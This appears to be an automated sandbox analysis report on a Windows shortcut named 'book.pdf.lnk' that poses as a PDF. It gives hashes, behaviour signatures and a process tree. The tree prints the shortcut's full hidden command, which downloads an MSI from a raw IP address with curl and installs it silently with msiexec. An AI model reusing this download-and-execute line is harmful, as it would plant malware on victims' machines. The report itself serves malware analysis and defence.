Resubmissions

24-08-2023 17:35

230824-v568qafh4y 3

23-08-2023 19:18

230823-xz2gdsfa82 3

23-08-2023 19:16

230823-xy925sfa76 3

21-08-2023 09:54

230821-lw62xscb47 10

21-08-2023 00:59

230821-bb4qysaa78 10

Analysis

  • max time kernel
    30s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-08-2023 19:16

General

  • Target

    book.pdf.lnk

  • Size

    1KB

  • MD5

    0185e0fc2f505312001e1a65e6783908

  • SHA1

    8e4cf0397ba32d233a515a5aca02751f6f9344c6

  • SHA256

    8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d

  • SHA512

    1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\system32\curl.exe
        curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu
        3⤵
          PID:3432
        • C:\Windows\system32\msiexec.exe
          msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4248
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3056

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi

      Filesize

      3B

      MD5

      8a80554c91d9fca8acb82f023de02f11

      SHA1

      5f36b2ea290645ee34d943220a14b54ee5ea5be5

      SHA256

      ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356

      SHA512

      ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a